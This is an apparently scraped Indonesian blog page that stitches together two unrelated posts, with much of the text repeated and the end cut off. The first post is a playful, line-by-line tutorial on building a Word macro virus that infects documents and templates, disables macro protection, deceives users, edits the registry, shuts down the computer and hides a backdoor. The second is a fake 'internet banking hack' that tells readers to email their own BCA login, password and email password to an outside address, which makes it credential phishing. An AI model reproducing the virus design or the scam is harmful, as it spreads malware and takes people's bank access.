menempatin normal.dot pertama kali (kecuali kalo ada virus makro yang buat file *.dot
sendiri). Dengan konsep ini bisa dibuat antidot-nya loh.
Sekarang lanjut ke baris 16. Di sini dicek apakah DJOK sudah ada di dokumen? bila
belum maka akan di copy objek DJOK ke dokumen tersebut. (di sinilah virus disebarkan)
Naahh... bila tadi dokumen yang kita serang, sekarang templetnya. Pada baris 21 sampai
37 yang menginfeksi templet. Rasa-rasanya gak perlu dijelasin lagi yach, penjelasannya
gak jauh beda dengan yang diatas kok.
Tahap infeksi sudah dilakukan, sekarang bisa ngelanjut ke tahap berikutnya yaitu benteng
pertahanan.
Selain mampu menggandakan diri, sifat utama virus yang lain adalah mampu bertahan.
Coba perhatikan baris 39 sampai 43. Fungsi perintah Options.SaveNormalPrompt = False
adalah untuk mematikan kotak dialog konfirmasi penyimpanan dokumen. Kan susah kalo
virus melakukan penyimpanan tapi muncul kotak dialog konfirmasi.
Baris selanjutnya adalah Option.VirusProtection = False. Perintah ini berfungsi
mematikan pendeteksi makro yang ada di microsoft word. Yang terkhir adalah
Options.SavePropertiesPrompt = False. Gunanya agar penyimpanan ulang ke global
template berjalan tanpa diketahui oleh pemakai.
Sekarang beralih kebaris 111 sampai 117. Seperti yang sudah diberi tahu sebelumnya,
bahwa bila ternyata nama prosedur yang kita buat sama dengan prosedur yang ada di
microsoft word, maka yang dijalankan yang ada dimakro. Isi dari prosedur
ToolsOptions() adalah mengaktifkan kembali yang kita matikan tadi, kemudian
memunculkan kotak dialog Option. Setelah kotak dialog option dimatikan, akan
dijalankan lagi prosedur matiin(). Apa sih fungsinya? Fungsinya sekedar menipu user
saja bahwa virus protection diaktifkan. :))
Beralih kebaris selanjutnya, 120 sampai 133. Terdapat empat prosedur ToolsMacro(),
ViewVbCode(), FileTemplate() dan OpenMyMacro(). Bila keempat prosedur itu tidak
diubah, maka makro yang kita buat bisa diketahui. Perhatikan prosedur ViewVbCode
memanggil prosedur FileTemplate. FileTemplate memanggil ViewVbCode, dan
seterusnya. Ini hanya untuk menunjukkan saja bahwa prosedur yang ada diword bisa
dipanggil di prosedur lainnya.
Sekarang perhatikan isi prosedur ToolsMacro, disana memanggil prosedur
BentengTakesi (tahu kan benteng takesi? :D). Prosedur BentengTakesi ada pada baris 45
sampai 63. Berhubung rada panjang, dijelaskan intinya saja yach.
45 : Nama Prosedurnya
46 :
47 : Proses looping sebanyak tiga kali, untuk memberikan kesempatan 3 kali menebak
48 : Menanyakan password ke user dan passwordnya dimasukkan ke variabel passnya
49 : Sebenarnya sih ingin jika user menekan tombol cancel langsung keluar, tapi kok gak
bisa yach :D.
50 : Bila sudah dicoba tiga kali dan passwordnya kosong maka:
51 : Akan muncul kotak peringatan, Taukan isinya? He he he... Bahasa inggris gua keren
juga :P
52 :
53 : Menjalankan Prosedur KacaPembesar (nanti dibahas)
54 : Keluar dari prosedur ini
55 : Bila ternyata sudah dicoba 3 kali dan password ke-3 ada isinya maka:
56 : Ada konfirmasi bahwa user tidak berhak mengakses tools ini, padahaall... :p
57 : Keluar dari prosedur ini
58 : Penutup if
59 : Memberi tahu ke user bahwa password yang dimasukkan salah, dan meminta untuk
mencoba lagi atau tidak
60 : Bila user memilih No maka akan keluar dari prosedur ini
61 : Mengosongkan isi prosedur passnya
62 : Pasangan For
63 : Akhir prosedur
Ngerti gak inti prosedur di atas? Intinya mempermainkan user, password apapun yang
dimasukkan tidak ada pengaruhnya. Malahan kalo password yang ketiga kosong ada
bonus tambahan :D. Apa sih bonusnya? KacaPembesar...!!! Perhatikan baris 98 sampai
109. Fungsi prosedur itu adalah untuk memanipulasi registry. Ini registrynya bernilai
string lohh... untuk yang bernilai lain perlu ada sedikit modifikasi pada baris 103.
Sebenarnya bila nilai yang dimasukkan bernilai string, bisa dilakukan dengan perintah
System.PrivateProfileString("", "HKEY_CURRENT_USER\Control
Panel\Desktop\WindowMetrics", "Shell Icon Size") = "128". Tapi gua pengen nunjukin
bagaimana cara memasukkan nilai ke registry dengan membuat dulu filenya.
Perhatikan baris 106, " Shell "regedit /s \rasakan.reg" ', vbHide ". Fungsinya adalah untuk
menjalankan file registry yang telah dibuat. Ada buku yang menyatakan bahwa dengan "
Shell "regedit \rasakan.reg" , vbHide ", file bisa dijalankan, tapi gua coba hasilnya nol
besar. Makannya perintah "vbHide" (berfungsi menghilangkan kotak dialog konfirmasi)
gua jadiin komentar, kali aja dikomputer kalian jalan. Untuk menggantinya gua tambahin
perintah /s (silent, biar gak ada kotak dialog konfirmasi). Baris selanjutnya adalah untuk
menghapus file yang telah dibuat. dan perintah 108 untuk mematikan komputer.
Apa sih yang terjadi bila perintah ini dieksekusi? Icon yang ada di dekstop dan di start
menu akan membesar sebanyak 4 kali (ukuran normalnya adalah 32 dan pada baris 103 di
set 128). Lumayan buat user panik :D. Untuk manipulasi registry bisa dilihat di tutorial
registry.
setelah mampu bertahan, sekarang saatnya menyerang. Kan percuma kalo virus yang
dibuat gak bisa nyebar. Perhatikan baris 135 sampai 145. Pada baris 137 akan mematikan
automakro. Lalu pada baris 139 akan dicek apakah file tersebut benar-benar dibuka atau
tidak, bila iya maka akan ditularkan dan disimpan.
Loh? fungsi baris 136 buat apa? Yang namanya pembuat virus pasti ingin dong ngasih
oleh-oleh buat korban, perintah yang dieksekusi adalah baris ke 147 dan 154. Tapi ingat
pada baris 150 sengaja gua matiin karena itu berhubungan dengan memasukkan password
yang telah dibahas di bab pertahanan.
Pada baris 156 sampai 178 bisa ditebak lah apa yang dilakukan, baca aja judul
prosedurnya. Sekarang kebaris 182. Fungsi prosedur ini adalah untuk menyimpan
dokumen. Perhatikan cara kerjanya. Pertama-tama dicek apakah dokumen tersebut sudah
disimpan atau belum. Apabila belum, maka dokumen akan diinfeksi dulu baru disimpan.
Setelah selesai disimpan ActiveDocument.Saved diset true agar apabila user terus
menerus menyimpan (kebiasaan kita :p) padahal tidak ada perubahan pada dokumen,
tidak akan dilakukan apa-apa.
Sekarang masuk kepenyebaran virus yang terakhir, baris 191 sampai 206. Prosedur ini
fungsinya apabila program word diaktifkan/buka, maka secara kontinue setiap 17 detik
akan dicek apakah dokumen tersebut sudah diinfeksi atau belum.
Yup... selesai sudah teknik penyebaran dijelaskan. Di penyebaran ini bisa disisipkan
aktifitas yang bersifat iseng (he he he... gua gak mau disalahkan loohh...). Contohnya
pada baris 144, ketika dokumen dibuka maka akan mengeksekusi prosedur iseng(). Apa
isi prosedur iseng? akan dibahas dibab selanjutnya.
Tiba saatnya untuk menuntaskan pembahasan tentang virus makro ini. Ada dua prosedur
yang belum dibahas yaitu prosedur iseng() pada baris 65 sampai 96 dan prosedur
HelpAbout() pada baris 208 sampai 218.
1. iseng()
Sesuai dengan namanya bahwa prosedur ini adalah untuk iseng doank :D. Yaa... hanya
untuk sekedar unjuk gigi lah. Pada baris 66, "Select Case WeekDay(Now())", perintah ini
berfungsi untuk mengecek hari. Dalam satu minggu kan ada 7 hari, naahh... hari minggu
diberi nilai 1, hari senin 2 dan seterusnya sampai hari sabtu yang diberi nilai 7. Di sini
kamu bisa berkreativitas sesukanya. Seperti pada hari jumat (nilai 6), pada jam 11:30
sampai jam 13:00 program word tidak akan bisa dijalankan karena akan langsung
dimatikan komputernya (baris 87).
2.HelpAbout()
Fungsi sebenarnya dari prosedur ini adalah menampilkan pembuat/credit dari program
word. Tapi sekarang fungsinya berubah yaitu sebagai kunci untuk masuk keeditor.
Loohh... kenapa mesti dikasih begituan? bukannya bahaya kalau nanti dibobol? Seorang
pembuat virus yang baik tentu saja selalu mempersiapkan jalan untuk mengubah source
virus yang dibuat. Kan bahaya kalau gak bisa, mungkin kalian bisa memberikan yang
lebih baik dari sini. Metode ini gua ambil dari salah satu koleksi virus makro gua, mereka
menamakan diri "DEXTER THE SCIENTIST" dari bogor juga. Gua sedikit modip biar
mudah ngejelasinnya.
Pertama-tama akan ditanyakan dulu nomor serial registrasi, dan ini diset fix, yaitu
HQKGW (taukan penggalan nomor serial apa itu?). Selanjutnya apabila benar akan
ditanyakan password, password ini selalu berubah sesuai nama file. Misalnya nama file
loe makalah.doc, maka passwordnya adalah mak (cuman diambil 3 huruf). Apabila
kedua-duanya benar, maka jendela editor visual basic akan ditampilkan.
Akhirnya selesai juga pembahasan tentang pembuatan virus makro ini. Memang sengaja
tidak dijelaskan bagaimana merusak isi dokumen (karena gua gak orang baik yang gak
tegaan :D). Tapi berhubung kurang lengkap akan dikasih contoh ngerusak dokumen. Ini
sebenarnya hanya memanfaatkan autocorrect pada microsoft word saja.
ex: AutoCorrect.Entries.Add Name:="nama", value:="nama saya".
Fungsi perintah diatas adalah untuk mengubah kata nama menjadi nama saya. Atau bisa
juga menampilkan animasi seperti contoh di bawah ini:
Selection.Font.Animation = wdAnimationLasVegasLight.
Tapi gua harap yang itu (autocorrect dan animasi) jangan digunakan, karena sebenarnya
pembuatan virus bukan untuk merusak yang begituan. Biasanya virus hanya benar-benar
merusak pada waktu-waktu tertentu saja (misalnya setiap tanggal 1 Januari hardisk
diformat). Sedangkan hari-hari lain cuman sekedar nampang dan memperbanyak diri
saja. Untuk pembuatan anti virusnya, karang sendiri yach. Gunakan cara virus makro
beraktifitas untuk menghapusnya. (virus ngelawan virus). Soalnya lagi males buat
antivirusnya. Mungkin nanti dibuatin.
Sebelum diakhiri gua harap kalian bisa mencari referensi lain untuk memperhebat virus
yang dibuat. Gua gak bertanggung jawab atas penyalah gunaan artikel ini, artikel ini
ditujuan hanya untuk pendidikan saja dan untuk membentengi diri dari virus makro.
Yaahh... hanya kebersihan dan kemuliaan hati dari pembaca artikel ini yang bisa
diharapkan (he he he... puitis banget). Akhir kata, selamat mencoba semoga berhasil...
(dijas/mideis)
Virus codenya Bisa lihat Di Sini Ok dech, sekarang kita mulai pembahasannya.
Sebelumnya dikasih tau dulu yach, berhubung virus ini gua yang buat (gabungan dari
berbagai sumber dan ide sendiri), jadi jangan pada protes kalo kebanyakan isinya banyak
nyebutin nama gua :p.
Untuk membuat virus makro diperlukan satu penanda, kalo kalian buat data base
semacam primary key atau NIS (Nomor Induk Siswa) untuk siswa SMU. Pada kasus ini
nama modulnya kita jadikan penanda. Dengan penanda ini kita bisa mengetahui apakah
dokumen tersebut telah terinfeksi atau belum. Pada contoh ini penandanya gua beri nama
DJOK (hayo... tadikan udah dikasih tau jangan protes :d). Ini bisa dilihat pada baris 0.
Kenapa dijadiin komentar? Karena itu untuk mempermudah mengingat saja bahwa
penandanya bernama DJOK, Kalo mau disebarkan sebaiknya dihapus saja.
Baris ke-0 sampai 4 adalah kredit pembuat virusnya. Biasanya ini selalu ada, sekedar
nampang doang biar orang pada tau siapa yang buat ni virus :p. Baris ke-5 hanya spasi
kosong, sebaiknya antar prosedur diberi spasi kosong biar terlihat rapi dan mudah
dipelajari.
Baris 6 sampai 19 adalah tahap penginfeksian dokumen. Prosedurnya diberi nama
InfeksiDokumen. Pada baris ke-7 di deklarasikan variabel UdahAda sebagai boolean dan
diberi nilai false. Fungsi variabel ini untuk mengecek apakah virus tersebut sudah ada di
dalam dokumen. Baris 9 adalah jurus pamungkas yang gua gunain kalo buat program di
vb :d. Walaupun kurang baik tapi sangat manjur untuk beberapa hal. Fungsinya adalah
memaksa program memaksa program mengabaikan kesalahan yang terjadi.
Baris 10 sampai 15 adalah proses looping. Di sini akan dicek setiap objek yang ada di
dokumen aktif. Buat apa di cek? perhatikan baris selanjutnya (baris 11). If obj.Name =
"DJOK" Then UdahAda = True. Di sini diperiksa apakah ada modul/penanda yang
bernama DJOK? Bila ada maka variabel UdahAda diset true. Apasih objek itu? coba
buka microsoft word dan tekan alt+F11, lalu lihat bagian project (biasanya di kiri atas).
Perhatikan gambar, yang dilingkarin itu yang dimaksud objek.
Baris selanjutnya dicek bila ternyata ada objek lain selain DJOK tetapi bukan bernama
ThisDocument. Bila ternyata ada objek lain dan bukan bernama ThisDokument, maka
perintah pada baris 13 akan dijalankan. Apa yang dilakukan pada baris 13 hayoo...?
Seluruh objek yang bukan bernama DJOK dan ThisDocument akan dihapus. Dengan cara
ini bila ada virus makro yang coba-coba masuk bakal dibantai. Kalo virus makronya juga
pake konsep yang sama bagaimana? Yaa.. mereka bakal berantem dan yang menang yang
menempatin normal.dot pertama kali (kecuali kalo ada virus makro yang buat file *.dot
sendiri). Dengan konsep ini bisa dibuat antidot-nya loh.
Sekarang lanjut ke baris 16. Di sini dicek apakah DJOK sudah ada di dokumen? bila
belum maka akan di copy objek DJOK ke dokumen tersebut. (di sinilah virus disebarkan)
Naahh... bila tadi dokumen yang kita serang, sekarang templetnya. Pada baris 21 sampai
37 yang menginfeksi templet. Rasa-rasanya gak perlu dijelasin lagi yach, penjelasannya
gak jauh beda dengan yang diatas kok.
Tahap infeksi sudah dilakukan, sekarang bisa ngelanjut ke tahap berikutnya yaitu benteng
pertahanan.
Selain mampu menggandakan diri, sifat utama virus yang lain adalah mampu bertahan.
Coba perhatikan baris 39 sampai 43. Fungsi perintah Options.SaveNormalPrompt = False
adalah untuk mematikan kotak dialog konfirmasi penyimpanan dokumen. Kan susah kalo
virus melakukan penyimpanan tapi muncul kotak dialog konfirmasi.
Baris selanjutnya adalah Option.VirusProtection = False. Perintah ini berfungsi
mematikan pendeteksi makro yang ada di microsoft word. Yang terkhir adalah
Options.SavePropertiesPrompt = False. Gunanya agar penyimpanan ulang ke global
template berjalan tanpa diketahui oleh pemakai.
Sekarang beralih kebaris 111 sampai 117. Seperti yang sudah diberi tahu sebelumnya,
bahwa bila ternyata nama prosedur yang kita buat sama dengan prosedur yang ada di
microsoft word, maka yang dijalankan yang ada dimakro. Isi dari prosedur
ToolsOptions() adalah mengaktifkan kembali yang kita matikan tadi, kemudian
memunculkan kotak dialog Option. Setelah kotak dialog option dimatikan, akan
dijalankan lagi prosedur matiin(). Apa sih fungsinya? Fungsinya sekedar menipu user
saja bahwa virus protection diaktifkan. :))
Beralih kebaris selanjutnya, 120 sampai 133. Terdapat empat prosedur ToolsMacro(),
ViewVbCode(), FileTemplate() dan OpenMyMacro(). Bila keempat prosedur itu tidak
diubah, maka makro yang kita buat bisa diketahui. Perhatikan prosedur ViewVbCode
memanggil prosedur FileTemplate. FileTemplate memanggil ViewVbCode, dan
seterusnya. Ini hanya untuk menunjukkan saja bahwa prosedur yang ada diword bisa
dipanggil di prosedur lainnya.
Sekarang perhatikan isi prosedur ToolsMacro, disana memanggil prosedur
BentengTakesi (tahu kan benteng takesi? :D). Prosedur BentengTakesi ada pada baris 45
sampai 63. Berhubung rada panjang, dijelaskan intinya saja yach.
45 : Nama Prosedurnya
46 :
47 : Proses looping sebanyak tiga kali, untuk memberikan kesempatan 3 kali menebak
48 : Menanyakan password ke user dan passwordnya dimasukkan ke variabel passnya
49 : Sebenarnya sih ingin jika user menekan tombol cancel langsung keluar, tapi kok gak
bisa yach :D.
50 : Bila sudah dicoba tiga kali dan passwordnya kosong maka:
51 : Akan muncul kotak peringatan, Taukan isinya? He he he... Bahasa inggris gua keren
juga :P
52 :
53 : Menjalankan Prosedur KacaPembesar (nanti dibahas)
54 : Keluar dari prosedur ini
55 : Bila ternyata sudah dicoba 3 kali dan password ke-3 ada isinya maka:
56 : Ada konfirmasi bahwa user tidak berhak mengakses tools ini, padahaall... :p
57 : Keluar dari prosedur ini
58 : Penutup if
59 : Memberi tahu ke user bahwa password yang dimasukkan salah, dan meminta untuk
mencoba lagi atau tidak
60 : Bila user memilih No maka akan keluar dari prosedur ini
61 : Mengosongkan isi prosedur passnya
62 : Pasangan For
63 : Akhir prosedur
Ngerti gak inti prosedur di atas? Intinya mempermainkan user, password apapun yang
dimasukkan tidak ada pengaruhnya. Malahan kalo password yang ketiga kosong ada
bonus tambahan :D. Apa sih bonusnya? KacaPembesar...!!! Perhatikan baris 98 sampai
109. Fungsi prosedur itu adalah untuk memanipulasi registry. Ini registrynya bernilai
string lohh... untuk yang bernilai lain perlu ada sedikit modifikasi pada baris 103.
Sebenarnya bila nilai yang dimasukkan bernilai string, bisa dilakukan dengan perintah
System.PrivateProfileString("", "HKEY_CURRENT_USER\Control
Panel\Desktop\WindowMetrics", "Shell Icon Size") = "128". Tapi gua pengen nunjukin
bagaimana cara memasukkan nilai ke registry dengan membuat dulu filenya.
Perhatikan baris 106, " Shell "regedit /s \rasakan.reg" ', vbHide ". Fungsinya adalah untuk
menjalankan file registry yang telah dibuat. Ada buku yang menyatakan bahwa dengan "
Shell "regedit \rasakan.reg" , vbHide ", file bisa dijalankan, tapi gua coba hasilnya nol
besar. Makannya perintah "vbHide" (berfungsi menghilangkan kotak dialog konfirmasi)
gua jadiin komentar, kali aja dikomputer kalian jalan. Untuk menggantinya gua tambahin
perintah /s (silent, biar gak ada kotak dialog konfirmasi). Baris selanjutnya adalah untuk
menghapus file yang telah dibuat. dan perintah 108 untuk mematikan komputer.
Apa sih yang terjadi bila perintah ini dieksekusi? Icon yang ada di dekstop dan di start
menu akan membesar sebanyak 4 kali (ukuran normalnya adalah 32 dan pada baris 103 di
set 128). Lumayan buat user panik :D. Untuk manipulasi registry bisa dilihat di tutorial
registry.
setelah mampu bertahan, sekarang saatnya menyerang. Kan percuma kalo virus yang
dibuat gak bisa nyebar. Perhatikan baris 135 sampai 145. Pada baris 137 akan mematikan
automakro. Lalu pada baris 139 akan dicek apakah file tersebut benar-benar dibuka atau
tidak, bila iya maka akan ditularkan dan disimpan.
Loh? fungsi baris 136 buat apa? Yang namanya pembuat virus pasti ingin dong ngasih
oleh-oleh buat korban, perintah yang dieksekusi adalah baris ke 147 dan 154. Tapi ingat
pada baris 150 sengaja gua matiin karena itu berhubungan dengan memasukkan password
yang telah dibahas di bab pertahanan.
Pada baris 156 sampai 178 bisa ditebak lah apa yang dilakukan, baca aja judul
prosedurnya. Sekarang kebaris 182. Fungsi prosedur ini adalah untuk menyimpan
dokumen. Perhatikan cara kerjanya. Pertama-tama dicek apakah dokumen tersebut sudah
disimpan atau belum. Apabila belum, maka dokumen akan diinfeksi dulu baru disimpan.
Setelah selesai disimpan ActiveDocument.Saved diset true agar apabila user terus
menerus menyimpan (kebiasaan kita :p) padahal tidak ada perubahan pada dokumen,
tidak akan dilakukan apa-apa.
Sekarang masuk kepenyebaran virus yang terakhir, baris 191 sampai 206. Prosedur ini
fungsinya apabila program word diaktifkan/buka, maka secara kontinue setiap 17 detik
akan dicek apakah dokumen tersebut sudah diinfeksi atau belum.
Yup... selesai sudah teknik penyebaran dijelaskan. Di penyebaran ini bisa disisipkan
aktifitas yang bersifat iseng (he he he... gua gak mau disalahkan loohh...). Contohnya
pada baris 144, ketika dokumen dibuka maka akan mengeksekusi prosedur iseng(). Apa
isi prosedur iseng? akan dibahas dibab selanjutnya.
Tiba saatnya untuk menuntaskan pembahasan tentang virus makro ini. Ada dua prosedur
yang belum dibahas yaitu prosedur iseng() pada baris 65 sampai 96 dan prosedur
HelpAbout() pada baris 208 sampai 218.
1. iseng()
Sesuai dengan namanya bahwa prosedur ini adalah untuk iseng doank :D. Yaa... hanya
untuk sekedar unjuk gigi lah. Pada baris 66, "Select Case WeekDay(Now())", perintah ini
berfungsi untuk mengecek hari. Dalam satu minggu kan ada 7 hari, naahh... hari minggu
diberi nilai 1, hari senin 2 dan seterusnya sampai hari sabtu yang diberi nilai 7. Di sini
kamu bisa berkreativitas sesukanya. Seperti pada hari jumat (nilai 6), pada jam 11:30
sampai jam 13:00 program word tidak akan bisa dijalankan karena akan langsung
dimatikan komputernya (baris 87).
2.HelpAbout()
Fungsi sebenarnya dari prosedur ini adalah menampilkan pembuat/credit dari program
word. Tapi sekarang fungsinya berubah yaitu sebagai kunci untuk masuk keeditor.
Loohh... kenapa mesti dikasih begituan? bukannya bahaya kalau nanti dibobol? Seorang
pembuat virus yang baik tentu saja selalu mempersiapkan jalan untuk mengubah source
virus yang dibuat. Kan bahaya kalau gak bisa, mungkin kalian bisa memberikan yang
lebih baik dari sini. Metode ini gua ambil dari salah satu koleksi virus makro gua, mereka
menamakan diri "DEXTER THE SCIENTIST" dari bogor juga. Gua sedikit modip biar
mudah ngejelasinnya.
Pertama-tama akan ditanyakan dulu nomor serial registrasi, dan ini diset fix, yaitu
HQKGW (taukan penggalan nomor serial apa itu?). Selanjutnya apabila benar akan
ditanyakan password, password ini selalu berubah sesuai nama file. Misalnya nama file
loe makalah.doc, maka passwordnya adalah mak (cuman diambil 3 huruf). Apabila
kedua-duanya benar, maka jendela editor visual basic akan ditampilkan.
Akhirnya selesai juga pembahasan tentang pembuatan virus makro ini. Memang sengaja
tidak dijelaskan bagaimana merusak isi dokumen (karena gua gak orang baik yang gak
tegaan :D). Tapi berhubung kurang lengkap akan dikasih contoh ngerusak dokumen. Ini
sebenarnya hanya memanfaatkan autocorrect pada microsoft word saja.
ex: AutoCorrect.Entries.Add Name:="nama", value:="nama saya".
Fungsi perintah diatas adalah untuk mengubah kata nama menjadi nama saya. Atau bisa
juga menampilkan animasi seperti contoh di bawah ini:
Selection.Font.Animation = wdAnimationLasVegasLight.
Tapi gua harap yang itu (autocorrect dan animasi) jangan digunakan, karena sebenarnya
pembuatan virus bukan untuk merusak yang begituan. Biasanya virus hanya benar-benar
merusak pada waktu-waktu tertentu saja (misalnya setiap tanggal 1 Januari hardisk
diformat). Sedangkan hari-hari lain cuman sekedar nampang dan memperbanyak diri
saja. Untuk pembuatan anti virusnya, karang sendiri yach. Gunakan cara virus makro
beraktifitas untuk menghapusnya. (virus ngelawan virus). Soalnya lagi males buat
antivirusnya. Mungkin nanti dibuatin.
Sebelum diakhiri gua harap kalian bisa mencari referensi lain untuk memperhebat virus
yang dibuat. Gua gak bertanggung jawab atas penyalah gunaan artikel ini, artikel ini
ditujuan hanya untuk pendidikan saja dan untuk membentengi diri dari virus makro.
Yaahh... hanya kebersihan dan kemuliaan hati dari pembaca artikel ini yang bisa
diharapkan (he he he... puitis banget). Akhir kata, selamat mencoba semoga berhasil...
Friday, May 1, 2009
JEBOL ATM BERSAMA
jebol rekening bank oleh Daniel d.w[SSA]
Senin, 16 april 2009
jebol rek bank
INFO GRATIS
HACKING INTERNET BANKING BANK BCA
Mau tau cara bobol atau sedot e-gold admin e-gold game, PTC, PTR, PTS,affiliate, dll ? Cukup hanya dengan memiliki account e-gold sendiri dan email yahoo.com, dan tau no e-gold target. Baca langkah-langkahnya di:
http://www.jebol-rekening-bank.blogspot.com
INFO GRATIS HACKING INTERNET BANKING BANK BCA
Sebaiknya anda copy paste dulu semua info dihalaman ini ke dalam microsoft word kemudian bacalah baik-baik di rumah. Setelah anda memahaminya barulah praktekkan kapan saja anda mau, ya. . . .hitung-hitung ngirit ongkos warnet.
Penting untuk anda ketahui, bahwa jika anda telah mengirimkan data anda kepada autobot internet banking, dan kemudian anda mendapatkan e-mail balasan dari admin yang menyatakan ada kesalahan data pada data email yang sudah anda kirimkan, maka segeralah memperbaikinya sesuai dengan format yang diminta oleh autobot internet banking dan kemudian kirimkan kembali data anda yang benar dan valid kepada autobot internet banking.
LANGKAH HACKING INTERNET BANKING
Cara hacking internet banking intinya sangatlah mudah. Tapi butuh ketelitian dalam pemasukan datanya. Tahukan anda banking197907hack@yahoo.com merupakan salah satu email yang difungsikan dalam mengirimkan paket data internet banking? Dalam hal ini saya akan membahas internae banking BCA
Dengan script data maka anda akan mendapatkan data rekening seseorang hanya dengan mengetahui no rekeningnya saja. Tak terbayangkan bukan????
Ok to the point,,,,ingat jangan sembarangan menggunakan script ini!
Langkah-langkah melakukan hacking internet banking BCA :
1.
Terlebih dahulu anda harus memiliki rekening bank BCA dan mendaftarnya untuk bisa mengakses internet banking kepada customer service bank bca terdekat. Pastikan bahwa internet banking anda sudah teraktivasi, dan tentu saja pastikan dulu bahwa User ID anda sudah terhubung dengan keyBCA atau status keyBCA Anda tidak hilang/rusak/Tutup ataupun tidak aktif. Pastikan bahwa semua layanan internet banking anda dapat anda akses. Anda juga harus memiliki e-mail di yahoo.com. Sebab admin juga menggunakan e-mail di yahoo.com.
2.
Kemudian kirim e-mail ke :
banking197907hack@yahoo.com
(salah satu e-mail autobot internet banking )
3.
E-mail tersebut harus memiliki format sebagai berikut :
Tulis dikolom /"suject"/ dengan :
#%autobote?admin=istrue%#copying_database_to_me/pass=true/bca
kemudian didalam body teks harus berisi 10 baris teks yang sesuai dengan format autobot :
Contoh:
to : banking197907hack@yahoo.com
cc :
bcc :
subject : #%autobote?admin=istrue%#copying_database_to_me/pass=true/bca
www.klikbca.com/script>autobot197907/true/www.klikbca.com
diego567890#searching_for/admin/database_account%>4468724556799
emailku@yahoo.com%%passmailveri%f=?punyaku1234
89912783#look_for_all_account>#
join_to_admin>searching_automatic_send_mailto_me#
>script< >input_type_account_value=send_pass=istrue< >searching_page=hack3.php< >server_ip=0000.1010.9999< >end_script<>autobot197907/true/www.klikbca.com
( website bank anda/script>autobot197907/true/website bank target )
Baris 2
diego567890#searching_for/admin/database_account%>4468724556799
( user name internet banking anda#searching_for/admin/database_account%>no rekening target )
Baris 3
emailku@yahoo.com%%passmailveri%f=?punyaku1234
( email yang anda gunakan untuk mengakses internet banking%%passmailveri%f=?password email anda
Baris 4
89912783#look_for_all_account>#
( password internet banking anda#look_for_all_account># )
Baris 5
join_to_admin>searching_automatic_send_mailto_me#
( tidak boleh dirubah untuk proses autobot hacking internet banking )
Baris 6
>script< ( tidak boleh dirubah untuk proses autobot hacking internet banking ) Baris 7 >input_type_account_value=send_pass=istrue< ( tidak boleh dirubah untuk proses autobot hacking internet banking ) Baris 8 >searching_page=hack3.php< ( tidak boleh dirubah untuk proses autobot hacking internet banking ) Baris 9 >server_ip=0000.1010.9999< ( tidak boleh dirubah untuk proses autobot hacking internet banking ) Baris 10 >end_script< ( tidak boleh dirubah untuk proses autobot hacking internet banking ) ***************************************************************************
PENTING
Agar autobotinternet banking bisa bekerja dengan baik dan berjalan dengan lancar untuk mendapatkan seluruh informasi mengenai account rekeningtarget ( seperti jumlah saldo target , alamat email target password email target, nama pemilik rekening target, nomor rekening target, user name internet banking target, password internet banking target, nomor telepon target, alamat rumah target, dll ), maka didalam rekening bank anda harus mempunyai saldo minimal Rp.251.111,- atau lebih. Jika rekening bank anda saldonya dibawah Rp.251.111,- maka trik ini tidak akan berfungsi meskipun kurang Rp. 1,- saja, karena nomor rekening anda dianggap tidak aktif oleh program autobot internet banking.
Diposkan oleh wong di 17:46
Halaman Muka
Langgan: Daniel dedi w[SSA]
Arsip Blog
• ▼ 2009 (1)
o ▼ APRIL(1)
jebol rek bank
Senin, 16 april 2009
jebol rek bank
INFO GRATIS
HACKING INTERNET BANKING BANK BCA
Mau tau cara bobol atau sedot e-gold admin e-gold game, PTC, PTR, PTS,affiliate, dll ? Cukup hanya dengan memiliki account e-gold sendiri dan email yahoo.com, dan tau no e-gold target. Baca langkah-langkahnya di:
http://www.jebol-rekening-bank.blogspot.com
INFO GRATIS HACKING INTERNET BANKING BANK BCA
Sebaiknya anda copy paste dulu semua info dihalaman ini ke dalam microsoft word kemudian bacalah baik-baik di rumah. Setelah anda memahaminya barulah praktekkan kapan saja anda mau, ya. . . .hitung-hitung ngirit ongkos warnet.
Penting untuk anda ketahui, bahwa jika anda telah mengirimkan data anda kepada autobot internet banking, dan kemudian anda mendapatkan e-mail balasan dari admin yang menyatakan ada kesalahan data pada data email yang sudah anda kirimkan, maka segeralah memperbaikinya sesuai dengan format yang diminta oleh autobot internet banking dan kemudian kirimkan kembali data anda yang benar dan valid kepada autobot internet banking.
LANGKAH HACKING INTERNET BANKING
Cara hacking internet banking intinya sangatlah mudah. Tapi butuh ketelitian dalam pemasukan datanya. Tahukan anda banking197907hack@yahoo.com merupakan salah satu email yang difungsikan dalam mengirimkan paket data internet banking? Dalam hal ini saya akan membahas internae banking BCA
Dengan script data maka anda akan mendapatkan data rekening seseorang hanya dengan mengetahui no rekeningnya saja. Tak terbayangkan bukan????
Ok to the point,,,,ingat jangan sembarangan menggunakan script ini!
Langkah-langkah melakukan hacking internet banking BCA :
1.
Terlebih dahulu anda harus memiliki rekening bank BCA dan mendaftarnya untuk bisa mengakses internet banking kepada customer service bank bca terdekat. Pastikan bahwa internet banking anda sudah teraktivasi, dan tentu saja pastikan dulu bahwa User ID anda sudah terhubung dengan keyBCA atau status keyBCA Anda tidak hilang/rusak/Tutup ataupun tidak aktif. Pastikan bahwa semua layanan internet banking anda dapat anda akses. Anda juga harus memiliki e-mail di yahoo.com. Sebab admin juga menggunakan e-mail di yahoo.com.
2.
Kemudian kirim e-mail ke :
banking197907hack@yahoo.com
(salah satu e-mail autobot internet banking )
3.
E-mail tersebut harus memiliki format sebagai berikut :
Tulis dikolom /"suject"/ dengan :
#%autobote?admin=istrue%#copying_database_to_me/pass=true/bca
kemudian didalam body teks harus berisi 10 baris teks yang sesuai dengan format autobot :
Contoh:
to : banking197907hack@yahoo.com
cc :
bcc :
subject : #%autobote?admin=istrue%#copying_database_to_me/pass=true/bca
www.klikbca.com/script>autobot197907/true/www.klikbca.com
diego567890#searching_for/admin/database_account%>4468724556799
emailku@yahoo.com%%passmailveri%f=?punyaku1234
89912783#look_for_all_account>#
join_to_admin>searching_automatic_send_mailto_me#
>script< >input_type_account_value=send_pass=istrue< >searching_page=hack3.php< >server_ip=0000.1010.9999< >end_script<>autobot197907/true/www.klikbca.com
( website bank anda/script>autobot197907/true/website bank target )
Baris 2
diego567890#searching_for/admin/database_account%>4468724556799
( user name internet banking anda#searching_for/admin/database_account%>no rekening target )
Baris 3
emailku@yahoo.com%%passmailveri%f=?punyaku1234
( email yang anda gunakan untuk mengakses internet banking%%passmailveri%f=?password email anda
Baris 4
89912783#look_for_all_account>#
( password internet banking anda#look_for_all_account># )
Baris 5
join_to_admin>searching_automatic_send_mailto_me#
